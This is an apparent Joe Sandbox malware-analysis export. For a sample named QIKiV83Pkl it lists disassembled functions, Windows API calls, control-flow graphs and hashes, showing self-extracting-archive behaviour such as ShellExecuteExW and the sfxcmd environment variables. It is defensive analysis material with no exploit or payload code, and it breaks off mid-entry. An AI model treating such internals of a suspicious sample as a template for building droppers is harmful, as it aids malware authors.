87d969-87d96d 756->758 757->756 758->731 758->757
                APIs
                • __EH_prolog.LIBCMT ref: 0087D346
                • _wcschr.LIBVCRUNTIME ref: 0087D367
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0087D328,?), ref: 0087D382
                • __fprintf_l.LIBCMT ref: 0087D873
                  • Part of subcall function 0088137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0087B652,00000000,?,?,?,000103EE), ref: 00881396
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                • API String ID: 4184910265-980926923
                • Opcode ID: 80c656e902aba8639b5706a2a8dcaa7d62ff280f3e9c1c98b5d69bca0a1837a8
                • Instruction ID: b21e2d03f651f01be8c3a23dc4ad2ad0c8d6af9863ac55a26ea43548ff20af8e
                • Opcode Fuzzy Hash: 80c656e902aba8639b5706a2a8dcaa7d62ff280f3e9c1c98b5d69bca0a1837a8
                • Instruction Fuzzy Hash: EF12BEB19003199ADF24EBA8CC81BEEB7B5FF04304F148569F619E7295EB70DA40CB65
                Function 0088CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 0088AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088AC85
                  • Part of subcall function 0088AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088AC96
                  • Part of subcall function 0088AC74: IsDialogMessageW.USER32(000103EE,?), ref: 0088ACAA
                  • Part of subcall function 0088AC74: TranslateMessage.USER32(?), ref: 0088ACB8
                  • Part of subcall function 0088AC74: DispatchMessageW.USER32(?), ref: 0088ACC2
                • GetDlgItem.USER32(00000068,008CECB0), ref: 0088CB6E
                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0088A632,00000001,?,?,0088AECB,008A4F88,008CECB0), ref: 0088CB96
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0088CBA1
                • SendMessageW.USER32(00000000,000000C2,00000000,008A35B4), ref: 0088CBAF
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088CBC5
                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0088CBDF
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088CC23
                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0088CC31
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088CC40
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088CC67
                • SendMessageW.USER32(00000000,000000C2,00000000,008A431C), ref: 0088CC76
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                • String ID: \
                • API String ID: 3569833718-2967466578
                • Opcode ID: cddb0a10b08b3296432a52dbbec577e129bbb1a83ed3faeb0d45a51b54f90b01
                • Instruction ID: 4282e9086399a8a847eaadd9bc5784984f594138eab4150d47a7d9d16de6f6ee
                • Opcode Fuzzy Hash: cddb0a10b08b3296432a52dbbec577e129bbb1a83ed3faeb0d45a51b54f90b01
                • Instruction Fuzzy Hash: BE31C171146752ABE301DF24DC4AFAB7FACFB92704F00061AF651D6291DB645D04C77A
                Function 0088CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 796 88ce22-88ce3a call 88e360 799 88d08b-88d093 796->799 800 88ce40-88ce4c call 8935b3 796->800 800->799 803 88ce52-88ce7a call 88f350 800->803 806 88ce7c 803->806 807 88ce84-88ce91 803->807 806->807 808 88ce93 807->808 809 88ce95-88ce9e 807->809 808->809 810 88cea0-88cea2 809->810 811 88ced6 809->811 812 88ceaa-88cead 810->812 813 88ceda-88cedd 811->813 814 88d03c-88d041 812->814 815 88ceb3-88cebb 812->815 816 88cedf-88cee2 813->816 817 88cee4-88cee6 813->817 820 88d043 814->820 821 88d036-88d03a 814->821 818 88cec1-88cec7 815->818 819 88d055-88d05d 815->819 816->817 822 88cef9-88cf0e call 87b493 816->822 817->822 823 88cee8-88ceef 817->823 818->819 824 88cecd-88ced4 818->824 826 88d05f-88d061 819->826 827 88d065-88d06d 819->827 825 88d048-88d04c 820->825 821->814 821->825 831 88cf10-88cf1d call 8817ac 822->831 832 88cf27-88cf32 call 87a180 822->832 823->822 828 88cef1 823->828 824->811 824->812 825->819 826->827 827->813 828->822 831->832 837 88cf1f 831->837 838 88cf4f-88cf5c ShellExecuteExW 832->838 839 88cf34-88cf4b call 87b239 832->839 837->832 841 88d08a 838->841 842 88cf62-88cf6f 838->842 839->838 841->799 844 88cf71-88cf78 842->844 845 88cf82-88cf84 842->845 844->845 846 88cf7a-88cf80 844->846 847 88cf9b-88cfba call 88d2e6 845->847 848 88cf86-88cf8f 845->848 846->845 849 88cff1-88cffd CloseHandle 846->849 847->849 866 88cfbc-88cfc4 847->866 848->847 854 88cf91-88cf99 ShowWindow 848->854 852 88d00e-88d01c 849->852 853 88cfff-88d00c call 8817ac 849->853 855 88d079-88d07b 852->855 856 88d01e-88d020 852->856 853->852 864 88d072 853->864 854->847 855->841 859 88d07d-88d07f 855->859 856->855 861 88d022-88d028 856->861 859->841 863 88d081-88d084 ShowWindow 859->863 861->855 865 88d02a-88d034 861->865 863->841 864->855 865->855 866->849 867 88cfc6-88cfd7 GetExitCodeProcess 866->867 867->849 868 88cfd9-88cfe3 867->868 869 88cfea 868->869 870 88cfe5 868->870 869->849 870->869
                APIs
                • ShellExecuteExW.SHELL32(?), ref: 0088CF54
                • ShowWindow.USER32(?,00000000), ref: 0088CF93
                • GetExitCodeProcess.KERNEL32(?,?), ref: 0088CFCF
                • CloseHandle.KERNEL32(?), ref: 0088CFF5
                • ShowWindow.USER32(?,00000001), ref: 0088D084
                  • Part of subcall function 008817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0087BB05,00000000,.exe,?,?,00000800,?,?,008885DF,?), ref: 008817C2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                • String ID: $.exe$.inf
                • API String ID: 3686203788-2452507128
                • Opcode ID: 4a8426b2062a279ad9ae648f61bcb9ca0e23e3cf512182a08a8b7162debd5144
                • Instruction ID: 25264dee300bc5ee8e24109836a2bf332814b7fa5abbab5e220ce36983ca92fd
                • Opcode Fuzzy Hash: 4a8426b2062a279ad9ae648f61bcb9ca0e23e3cf512182a08a8b7162debd5144
                • Instruction Fuzzy Hash: E66119704047809AEB31BF64D804AABBBF5FF95304F04881EF5C5D7299DBB19985CB62
                Function 0089A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 871 89a058-89a071 872 89a073-89a083 call 89e6ed 871->872 873 89a087-89a08c 871->873 872->873 880 89a085 872->880 874 89a099-89a0bd MultiByteToWideChar 873->874 875 89a08e-89a096 873->875 877 89a250-89a263 call 88ec4a 874->877 878 89a0c3-89a0cf 874->878 875->874 881 89a0d1-89a0e2 878->881 882 89a123 878->882 880->873 885 89a101-89a112 call 898518 881->885 886 89a0e4-89a0f3 call 8a1a30 881->886 884 89a125-89a127 882->884 888 89a12d-89a140 MultiByteToWideChar 884->888 889 89a245 884->889 885->889 899 89a118 885->899 886->889 898 89a0f9-89a0ff 886->898 888->889 892 89a146-89a158 call 89a72c 888->892 893 89a247-89a24e call 89a2c0 889->893 900 89a15d-89a161 892->900 893->877 902 89a11e-89a121 898->902 899->902 900->889 903 89a167-89a16e 900->903 902->884 904 89a1a8-89a1b4 903->904 905 89a170-89a175 903->905 907 89a200 904->907 908 89a1b6-89a1c7 904->908 905->893 906 89a17b-89a17d 905->906 906->889 909 89a183-89a19d call 89a72c 906->909 910 89a202-89a204 907->910 911 89a1c9-89a1d8 call 8a1a30 908->911 912 89a1e2-89a1f3 call 898518 908->912 909->893 926 89a1a3 909->926 915 89a23e-89a244 call 89a2c0 910->915 916 89a206-89a21f call 89a72c 910->916 911->915 924 89a1da-89a1e0 911->924 912->915 925 89a1f5 912->925 915->889 916->915 929 89a221-89a228 916->929 928 89a1fb-89a1fe 924->928 925->928 926->889 928->910 930 89a22a-89a22b 929->930 931 89a264-89a26a 929->931 932 89a22c-89a23c WideCharToMultiByte 930->932 931->932 932->915 933 89a26c-89a273 call 89a2c0 932->933 933->893
                APIs
                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00894E35,00894E35,?,?,?,0089A2A9,00000001,00000001,3FE85006), ref: 0089A0B2
                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0089A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0089A138
                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0089A232
                • __freea.LIBCMT ref: 0089A23F
                  • Part of subcall function 00898518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0089C13D,00000000,?,008967E2,?,00000008,?,008989AD,?,?,?), ref: 0089854A
                • __freea.LIBCMT ref: 0089A248
                • __freea.LIBCMT ref: 0089A26D
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ByteCharMultiWide__freea$AllocateHeap
                • String ID:
                • API String ID: 1414292761-0
                • Opcode ID: f6fd6cd06936adfd046c4eee68f8b68ac569cfbf2b790233447164cba618e46b
                • Instruction ID: 1328a08402b029842e56718e1a1581ae99a8d4bc115ebeddebfafb30d70d445f
                • Opcode Fuzzy Hash: f6fd6cd06936adfd046c4eee68f8b68ac569cfbf2b790233447164cba618e46b
                • Instruction Fuzzy Hash: 7951C372610216AFEF29AFA4CC41EBB77AAFB41B54F194629FC05D6180DB35DC40C6E2
                Function 008799B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 936 8799b0-8799d1 call 88e360 939 8799d3-8799d6 936->939 940 8799dc 936->940 939->940 941 8799d8-8799da 939->941 942 8799de-8799fb 940->942 941->942 943 879a03-879a0d 942->943 944 8799fd 942->944 945 879a12-879a31 call 8770bf 943->945 946 879a0f 943->946 944->943 949 879a33 945->949 950 879a39-879a57 CreateFileW 945->950 946->945 949->950 951 879abb-879ac0 950->951 952 879a59-879a7b GetLastError call 87b66c 950->952 953 879ac2-879ac5 951->953 954 879ae1-879af5 951->954 960 879a7d-879a9f CreateFileW GetLastError 952->960 961 879aaa-879aaf 952->961 953->954 957 879ac7-879adb SetFileTime 953->957 958 879af7-879b0f call 87fe56 954->958 959 879b13-879b1e 954->959 957->954 958->959 963 879aa5-879aa8 960->963 964 879aa1 960->964 961->951 965 879ab1 961->965 963->951 963->961 964->963 965->951
                APIs
                • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008778AD,?,00000005,?,00000011), ref: 00879A4C
                • GetLastError.KERNEL32(?,?,008778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00879A59
                • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,008778AD,?,00000005,?), ref: 00879A8E
                • GetLastError.KERNEL32(?,?,008778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00879A96
                • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008778AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00879ADB
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: File$CreateErrorLast$Time
                • String ID:
                • API String ID: 1999340476-0
                • Opcode ID: 3aa60259612f29f7380d6fc7d928dabc60e1dfcdf7d5867b1ada37db684a69e6
                • Instruction ID: 60d57d326d8bcf37f4ad42d14d561edfb8e67ef11f11071c09ae3748354c53aa
                • Opcode Fuzzy Hash: 3aa60259612f29f7380d6fc7d928dabc60e1dfcdf7d5867b1ada37db684a69e6
                • Instruction Fuzzy Hash: BD413330544B556FE3208B24CC06BDAFAD4FB02324F104719F6E8D61D1E374E9888B96
                Function 0088AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 995 88ac74-88ac8d PeekMessageW 996 88acc8-88accc 995->996 997 88ac8f-88aca3 GetMessageW 995->997 998 88acb4-88acc2 TranslateMessage DispatchMessageW 997->998 999 88aca5-88acb2 IsDialogMessageW 997->999 998->996 999->996 999->998
                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0088AC85
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0088AC96
                • IsDialogMessageW.USER32(000103EE,?), ref: 0088ACAA
                • TranslateMessage.USER32(?), ref: 0088ACB8
                • DispatchMessageW.USER32(?), ref: 0088ACC2
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: Message$DialogDispatchPeekTranslate
                • String ID:
                • API String ID: 1266772231-0
                • Opcode ID: 81ad2a9247521b23ce63f238fdedac6b12bc30d87cf4e31104e0cb4d5b12c654
                • Instruction ID: 0abc7fca758fedf83722343334918750996bcd15502e444895e88a96d995eaf9
                • Opcode Fuzzy Hash: 81ad2a9247521b23ce63f238fdedac6b12bc30d87cf4e31104e0cb4d5b12c654
                • Instruction Fuzzy Hash: 28F03071D02129AB9B20ABE2DC4CDEB7F6CFF152517408616F405D2140EB38D905CBB1
                Function 0088A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1000 88a2c7-88a2e6 GetClassNameW 1001 88a2e8-88a2fd call 8817ac 1000->1001 1002 88a30e-88a310 1000->1002 1007 88a30d 1001->1007 1008 88a2ff-88a30b FindWindowExW 1001->1008 1004 88a31b-88a31f 1002->1004 1005 88a312-88a315 SHAutoComplete 1002->1005 1005->1004 1007->1002 1008->1007
                APIs
                • GetClassNameW.USER32(?,?,00000050), ref: 0088A2DE
                • SHAutoComplete.SHLWAPI(?,00000010), ref: 0088A315
                  • Part of subcall function 008817AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0087BB05,00000000,.exe,?,?,00000800,?,?,008885DF,?), ref: 008817C2
                • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0088A305
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: AutoClassCompareCompleteFindNameStringWindow
                • String ID: EDIT
                • API String ID: 4243998846-3080729518
                • Opcode ID: 9b39c4fa3eaabc1386bf4ad987d9cbf1f4906c2b79241d1490c9404ce45c7cf5
                • Instruction ID: 8baeb38562f5e23297e0fb51312628edfb3049c4732a7681cbafdfb9c275a99a
                • Opcode Fuzzy Hash: 9b39c4fa3eaabc1386bf4ad987d9cbf1f4906c2b79241d1490c9404ce45c7cf5
                • Instruction Fuzzy Hash: 2EF08232A026287BFB2066649C09F9B776CFB56B10F080157BE05E22C0D7609D45C7F6
                Function 0088A335 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35comCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                  • Part of subcall function 00880085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008800A0
                  • Part of subcall function 00880085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087EB86,Crypt32.dll,00000000,0087EC0A,?,?,0087EBEC,?,?,?), ref: 008800C2
                • OleInitialize.OLE32(00000000), ref: 0088A34E
                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0088A385
                • SHGetMalloc.SHELL32(008B8430), ref: 0088A38F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                • String ID: riched20.dll
                • API String ID: 3498096277-3360196438
                • Opcode ID: 54a188dd66e37d4247ae6386009967ac16b8eaec2794c4bb07ca79d9bfba53b8
                • Instruction ID: d892e47862b0dd6481473d428dfb9da8a7342b5da3aa465f7ffeee2ed507c91c
                • Opcode Fuzzy Hash: 54a188dd66e37d4247ae6386009967ac16b8eaec2794c4bb07ca79d9bfba53b8
                • Instruction Fuzzy Hash: B9F03CB1800209ABDB10AF9998499EFFBFCFB95301F00415AE814E2200CBB416058BA1
                Function 0088D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1013 88d287-88d2b2 call 88e360 SetEnvironmentVariableW call 87fbd8 1017 88d2b7-88d2bb 1013->1017 1018 88d2bd-88d2c1 1017->1018 1019 88d2df-88d2e3 1017->1019 1020 88d2ca-88d2d1 call 87fcf1 1018->1020 1023 88d2c3-88d2c9 1020->1023 1024 88d2d3-88d2d9 SetEnvironmentVariableW 1020->1024 1023->1020 1024->1019
                APIs
                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088D29D
                • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088D2D9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: EnvironmentVariable
                • String ID: sfxcmd$sfxpar
                • API String ID: 1431749950-3493335439
                • Opcode ID: 684de7e6cc6155ee7092df0b78d3aca59e59efce6f37fc9386ea590c098f2229
                • Instruction ID: f17ebfe8d379f84c84a15014a68177f76b078ba59872350134d7b794dec29430
                • Opcode Fuzzy Hash: 684de7e6cc6155ee7092df0b78d3aca59e59efce6f37fc9386ea590c098f2229
                • Instruction Fuzzy Hash: 25F0A77280062CA7D7203F959C09ABA7758FF0A751B004051FD48D6642D764DD41D7F1
                Function 0087984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1025 87984e-87985a 1026 879867-87987e ReadFile 1025->1026 1027 87985c-879864 GetStdHandle 1025->1027 1028 879880-879889 call 879989 1026->1028 1029 8798da 1026->1029 1027->1026 1033 8798a2-8798a6 1028->1033 1034 87988b-879893 1028->1034 1031 8798dd-8798e2 1029->1031 1036 8798b7-8798bb 1033->1036 1037 8798a8-8798b1 GetLastError 1033->1037 1034->1033 1035 879895 1034->1035 1038 879896-8798a0 call 87984e 1035->1038 1040 8798d5-8798d8 1036->1040 1041 8798bd-8798c5 1036->1041 1037->1036 1039 8798b3-8798b5 1037->1039 1038->1031 1039->1031 1040->1031 1041->1040 1043 8798c7-8798d0 GetLastError 1041->1043 1043->1040 1045 8798d2-8798d3 1043->1045 1045->1038
                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 0087985E
                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00879876
                • GetLastError.KERNEL32 ref: 008798A8
                • GetLastError.KERNEL32 ref: 008798C7
                Memory Dump Source
                • Source File: 00000000.00000002.1336786371.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                • Associated: 00000000.00000002.1336764606.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336816294.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336837768.00000000008D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1336892209.00000000008E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_870000_QIKiV83Pkl.jbxd
                Similarity
                • API ID: ErrorLast$FileHandleRead
                • String ID:
                • API String ID: 2244327787-0
                • Opcode ID: 25c11f50384bd5f718aa129b5b0b00dfe9a94d5b1e80e1c3c8cc784e2cbcfec3
                • Instruction ID: e7f84c8d38212602875a2d9f08be03bc9ae474f5349d7439e427bf6ca13c3afc
                • Opcode Fuzzy Hash: 25c11f50384bd5f718aa129b5b0b00dfe9a94d5b1e80e1c3c8cc784e2cbcfec3
                • Instruction Fuzzy Hash: 63117C30904608EBEB205B55C804A6977ACFB0B735F10C53AF8AED5A98D735DE409F53
                Function 0089A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0087CFE0,00000000,00000000,?,0089A49B,0087CFE0,00000000,00000000,00000000,?,0089A698,00000006,FlsSetValue), ref: 0089A526
